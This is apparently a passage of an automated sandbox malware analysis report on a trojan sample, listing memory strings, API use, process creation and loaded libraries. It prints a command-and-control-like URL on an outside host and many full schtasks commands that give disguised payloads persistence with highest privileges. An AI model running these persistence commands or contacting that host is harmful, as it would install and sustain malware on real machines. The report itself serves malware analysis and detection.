            Source: Idle.exe, 00000015.00000002.1857787065.00000000027A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1067345.xsph.ru/
            Source: Idle.exe, 00000015.00000002.1857787065.00000000027AF000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027D8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1867010896.000000001B7B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839e
            Source: intoDhcp.exe, 00000004.00000002.1750999526.0000000003644000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000015.00000002.1857787065.00000000027AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0017718C
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017857B0_2_0017857B
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019D00E0_2_0019D00E
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017407E0_2_0017407E
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_001870BF0_2_001870BF
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_001A11940_2_001A1194
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_001732810_2_00173281
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017E2A00_2_0017E2A0
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_001902F60_2_001902F6
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_001866460_2_00186646
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019070E0_2_0019070E
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019473A0_2_0019473A
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_001837C10_2_001837C1
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_001727E80_2_001727E8
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017E8A00_2_0017E8A0
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_001949690_2_00194969
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017F9680_2_0017F968
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00183A3C0_2_00183A3C
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00186A7B0_2_00186A7B
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00190B430_2_00190B43
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019CB600_2_0019CB60
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00185C770_2_00185C77
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017ED140_2_0017ED14
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00183D6D0_2_00183D6D
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018FDFA0_2_0018FDFA
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017BE130_2_0017BE13
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017DE6C0_2_0017DE6C
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00175F3C0_2_00175F3C
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00190F780_2_00190F78
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeCode function: 4_2_00007FFD9BA036554_2_00007FFD9BA03655
            Source: C:\Program Files\Windows Portable Devices\Idle.exeCode function: 18_2_00007FFD9B9E365518_2_00007FFD9B9E3655
            Source: C:\Program Files\Windows Portable Devices\Idle.exeCode function: 21_2_00007FFD9BA1365521_2_00007FFD9BA13655
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeCode function: 23_2_00007FFD9BA0365523_2_00007FFD9BA03655
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeCode function: 26_2_00007FFD9BA1365526_2_00007FFD9BA13655
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: String function: 0018E360 appears 52 times
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: String function: 0018ED00 appears 31 times
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: String function: 0018E28C appears 35 times
            Source: intoDhcp.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: OjTEkrTlLyhdt.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: dasHost.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: rWjaZEKha8.exe, 00000000.00000003.1657120540.0000000006BC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs rWjaZEKha8.exe
            Source: rWjaZEKha8.exe, 00000000.00000003.1656716234.0000000006BCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs rWjaZEKha8.exe
            Source: rWjaZEKha8.exe, 00000000.00000003.1656117099.00000000062CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs rWjaZEKha8.exe
            Source: rWjaZEKha8.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs rWjaZEKha8.exe
            Source: rWjaZEKha8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, cW6JfMtNAY691bDVIIZ.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, cW6JfMtNAY691bDVIIZ.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, YLBOejLqkP7JJsWpVv2.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, YLBOejLqkP7JJsWpVv2.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, cW6JfMtNAY691bDVIIZ.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, cW6JfMtNAY691bDVIIZ.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, YLBOejLqkP7JJsWpVv2.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, YLBOejLqkP7JJsWpVv2.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, VeBxUrwVjT0KXvHo2cR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.rWjaZEKha8.exe.631b53a.0.raw.unpack, VeBxUrwVjT0KXvHo2cR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, VeBxUrwVjT0KXvHo2cR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.rWjaZEKha8.exe.6c1a53a.1.raw.unpack, VeBxUrwVjT0KXvHo2cR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@51/28@1/1
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00176EC9 GetLastError,FormatMessageW,0_2_00176EC9
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_00189E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00189E1C
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Users\user\OjTEkrTlLyhdt.exeJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
            Source: C:\Program Files\Windows Portable Devices\Idle.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3f8e52fc26604f37f7b216339b61e4b634e6416b
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile created: C:\Users\user\AppData\Local\Temp\ILJWfEtwdoJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCommand line argument: sfxname0_2_0018D5D4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCommand line argument: sfxstime0_2_0018D5D4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCommand line argument: STARTDLG0_2_0018D5D4
            Source: rWjaZEKha8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: rWjaZEKha8.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rWjaZEKha8.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeFile read: C:\Users\user\Desktop\rWjaZEKha8.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rWjaZEKha8.exe "C:\Users\user\Desktop\rWjaZEKha8.exe"
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgehyperperfdhcp\intoDhcp.exe "C:\bridgehyperperfdhcp\intoDhcp.exe"
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
            Source: unknownProcess created: C:\Program Files\Windows Portable Devices\Idle.exe "C:\Program Files\Windows Portable Devices\Idle.exe"
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files\Windows Portable Devices\Idle.exe "C:\Program Files\Windows Portable Devices\Idle.exe"
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /f
            Source: unknownProcess created: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 8 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgehyperperfdhcp\intoDhcp.exe "C:\bridgehyperperfdhcp\intoDhcp.exe"Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeSection loaded: textinputframework.dllJump to behavior
